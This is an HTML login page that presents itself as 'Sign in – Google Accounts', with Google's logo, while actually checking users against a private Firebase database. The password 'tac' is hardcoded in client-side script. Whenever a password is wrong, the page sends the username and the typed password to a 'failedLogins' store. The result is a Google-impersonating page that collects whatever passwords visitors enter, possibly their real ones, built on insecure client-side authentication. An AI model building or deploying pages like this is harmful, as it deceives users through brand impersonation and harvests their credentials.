<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>Sign in – Google Accounts</title>
<link rel="icon" type="image/png" href="favicon.png" />
<style>
  body {
    font-family: Arial, sans-serif;
    background: #f1f1f1;
    display: flex;
    justify-content: center;
    align-items: center;
    height: 100vh;
    margin: 0;
  }
  .container {
    background: white;
    padding: 40px;
    border-radius: 8px;
    box-shadow: 0 2px 10px rgba(0,0,0,0.2);
    width: 360px;
    text-align: center;
  }
  .google-logo {
    width: 75px;
    margin-bottom: 20px;
  }
  input {
    width: 100%;
    padding: 10px;
    margin: 12px 0;
    border: 1px solid #ccc;
    border-radius: 4px;
    font-size: 14px;
  }
  button {
    width: 100%;
    padding: 10px;
    background: #1a73e8;
    color: white;
    border: none;
    border-radius: 4px;
    font-size: 14px;
    cursor: pointer;
  }
  button:hover {
    background: #0c5adb;
  }
  .link {
    color: #1a73e8;
    cursor: pointer;
    font-size: 14px;
  }
  .error {
    color: red;
    margin-top: 5px;
  }
  .info {
    color: #333;
    margin-top: 5px;
    font-size: 14px;
  }

  /* Small create account link */
  .small-link {
    font-size: 11px;
    color: #666;
    cursor: pointer;
    margin-top: 6px;
    user-select: none;
  }
  .small-link:hover {
    text-decoration: underline;
  }
  /* Enlarged and colored create account link */
  .big-link {
    font-size: 14px !important;
    color: #4caf50 !important;
    font-weight: 600 !important;
  }
</style>
</head>
<body>

<div class="container">
  <img
    src="https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_92x30dp.png"
    class="google-logo"
    alt="Google"
  />
  <h2 id="form-title">Sign in</h2>

  <!-- Step 1: Username input -->
  <div id="step-username">
    <input type="text" id="username" placeholder="Email or phone" autocomplete="username" />
    <div class="error" id="username-error"></div>
    <button onclick="checkUsername()">Next</button>

    <p
      id="create-account-link"
      class="small-link"
      onclick="showCreateAccount()"
      title="Create a new account if you don't have one"
    >
      Create account
    </p>

    <p class="error" id="no-account-msg" style="display:none; margin-top: 6px;">
      You don't have an account! Try creating one.
    </p>
  </div>

  <!-- Step 2: Password input -->
  <div id="step-password" style="display:none;">
    <input
      type="password"
      id="password"
      placeholder="Enter your password"
      autocomplete="current-password"
    />
    <div class="error" id="password-error"></div>
    <button onclick="checkPassword()">Next</button>
  </div>

  <!-- Step 3: Create account -->
  <div id="step-create" style="display:none;">
    <input
      type="text"
      id="new-username"
      placeholder="Choose your username"
      autocomplete="username"
    />
    <div class="error" id="create-error"></div>
    <button onclick="createAccount()">Submit</button>
    <p class="info">
      Your request will be sent for approval. You will be notified once
      approved.
    </p>
  </div>
</div>

<!-- Firebase SDKs -->
<script src="https://www.gstatic.com/firebasejs/9.23.0/firebase-app-compat.js"></script>
<script src="https://www.gstatic.com/firebasejs/9.23.0/firebase-database-compat.js"></script>

<script>
  const firebaseConfig = {
    apiKey: "AIzaSyBQslLAFRlIRJqsiJ2WWeTNslO067bzKYM",
    authDomain: "taclogin-ab38e.firebaseapp.com",
    databaseURL: "https://taclogin-ab38e-default-rtdb.firebaseio.com",
    projectId: "taclogin-ab38e",
    storageBucket: "taclogin-ab38e.firebasestorage.app",
    messagingSenderId: "937853298051",
    appId: "1:937853298051:web:119ccc7b5499514bd442b6",
  };

  firebase.initializeApp(firebaseConfig);
  const db = firebase.database();

  let currentUser = "";

  function resetErrors() {
    document.getElementById("username-error").innerText = "";
    document.getElementById("password-error").innerText = "";
    document.getElementById("create-error").innerText = "";
    document.getElementById("no-account-msg").style.display = "none";
    const createLink = document.getElementById("create-account-link");
    createLink.classList.remove("big-link");
  }

  function checkUsername() {
    resetErrors();
    const username = document.getElementById("username").value.trim();
    if (!username) {
      document.getElementById("username-error").innerText = "Enter a username";
      return;
    }
    db.ref("allowedUsers/" + username).once("value").then((snapshot) => {
      const createLink = document.getElementById("create-account-link");
      const noAccountMsg = document.getElementById("no-account-msg");

      if (snapshot.exists()) {
        currentUser = username;
        document.getElementById("step-username").style.display = "none";
        document.getElementById("step-password").style.display = "block";

        noAccountMsg.style.display = "none";
        createLink.classList.remove("big-link");
      } else {
        noAccountMsg.style.display = "block";
        createLink.classList.add("big-link");
      }
    });
  }

  function checkPassword() {
    resetErrors();
    const password = document.getElementById("password").value.trim();
    if (password === "tac") {
      // Increment user login count transactionally
      const userRef = db.ref("logins/" + currentUser);
      userRef.transaction((currentCount) => (currentCount || 0) + 1);

      // Increment global login count
      const totalRef = db.ref("totalLogins");
      totalRef.transaction((count) => (count || 0) + 1);

      window.location.href = "index.html";
    } else {
      document.getElementById("password-error").innerText = "Wrong password";

      // Log failed attempt with username and attempted password
      db.ref("failedLogins").push({
        username: currentUser,
        triedPassword: password,
        time: new Date().toISOString(),
      });
    }
  }

  function showCreateAccount() {
    resetErrors();
    document.getElementById("step-username").style.display = "none";
    document.getElementById("step-create").style.display = "block";
    document.getElementById("new-username").value = document
      .getElementById("username")
      .value.trim();
  }

  function createAccount() {
    resetErrors();
    const newUser = document.getElementById("new-username").value.trim();
    if (!newUser) {
      document.getElementById("create-error").innerText = "Enter a username";
      return;
    }

    // Check if already exists in allowedUsers or pendingAccounts
    Promise.all([
      db.ref("allowedUsers/" + newUser).once("value"),
      db.ref("pendingAccounts/" + newUser).once("value"),
    ]).then(([allowedSnap, pendingSnap]) => {
      if (allowedSnap.exists()) {
        document.getElementById("create-error").innerText =
          "Account already approved. Please login.";
      } else if (pendingSnap.exists()) {
        document.getElementById("create-error").innerText =
          "Account creation pending approval.";
      } else {
        // Add to pendingAccounts for admin approval
        db.ref("pendingAccounts/" + newUser).set({
          requestedAt: new Date().toISOString(),
        });
        alert(
          "Account request sent for approval. You will be notified once approved."
        );
        // Send them back to username input to login after approval
        document.getElementById("step-create").style.display = "none";
        document.getElementById("step-username").style.display = "block";
      }
    });
  }
</script>

</body>
</html>
